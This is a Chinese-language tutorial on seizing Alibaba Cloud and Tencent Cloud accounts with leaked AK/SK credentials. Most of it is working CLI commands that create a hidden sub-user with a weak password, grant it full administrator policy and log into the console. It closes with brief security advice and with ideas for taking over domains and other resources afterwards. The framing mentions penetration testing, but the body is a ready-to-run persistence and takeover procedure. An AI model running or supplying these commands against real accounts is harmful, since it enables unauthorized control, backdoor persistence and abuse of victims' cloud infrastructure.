利用AK/SK接管云平台的教学文档

概述

本教学文档详细说明如何通过获取的Access Key (AK)和Secret Key (SK)接管阿里云和腾讯云平台。该方法通过创建具有高权限的子用户/子账号，实现云平台控制台的完整登录权限。

前提条件

• 已获取目标云平台的AK/SK密钥对
• 密钥具有足够的权限创建用户和分配权限

阿里云接管方法

1. 安装阿里云CLI工具

从官方GitHub仓库下载并安装：

https://github.com/aliyun/aliyun-cli/blob/master/README-CN.md

2. 配置AK/SK

./aliyun configure --profile akprofile

按照提示输入AK、SK、Region等信息。

3. 创建RAM用户

./aliyun ram CreateUser --UserName SxfnbQaxsb2333

4. 为用户设置登录密码

./aliyun ram CreateLoginProfile --UserName SxfnbQaxsb2333 --Password 123456

5. 分配管理员权限

./aliyun ram AttachPolicyToUser --PolicyType System --PolicyName AdministratorAccess --UserName SxfnbQaxsb2333

6. 获取账号别名

./aliyun ram GetAccountAlias

7. 登录方式

登录地址格式：

创建的用户名@别名.onaliyun.com

例如：SxfnbQaxsb2333@company-alias.onaliyun.com

腾讯云接管方法

1. 安装腾讯云CLI工具

从官方GitHub仓库下载并安装：

https://github.com/TencentCloud/tencentcloud-cli

2. 获取主账号ID

tccli cam GetUserAppId --cli-unfold-argument

3. 创建子用户

tccli cam AddUser --cli-unfold-argument --Name Sxfnb2333 --Remark sxf --ConsoleLogin 1 --Password '123456' --NeedResetPassword 0

4. 查询策略列表

tccli cam ListPolicies --cli-unfold-argument

5. 分配最高权限

tccli cam AttachUserPolicy --cli-unfold-argument --PolicyId 1 --AttachUin 100035117703

注：PolicyId 1通常对应管理员权限，AttachUin参数为主账号ID。

6. 列出所有子用户

tccli cam ListUsers --cli-unfold-argument

7. 登录方式

使用创建的子用户名和密码登录腾讯云控制台，登录时需要提供主账号ID。

安全建议

1. AK/SK保护：AK/SK等同于密码，必须严格保护
2. 最小权限原则：仅为用户分配必要的最小权限
3. 定期轮换：定期更换AK/SK密钥
4. 审计日志：启用并监控云平台操作日志
5. MFA启用：为高权限账号启用多因素认证

扩展思路

1. 通过此方法可以接管云平台后进一步控制：

   • 域名服务
   • IM服务
   • 其他云资源

2. 其他云平台（如AWS、华为云等）方法类似，参考官方API文档即可实现。

3. 在渗透测试中，获取AK/SK后应优先检查其权限范围，可能直接具备高权限而无需创建新用户。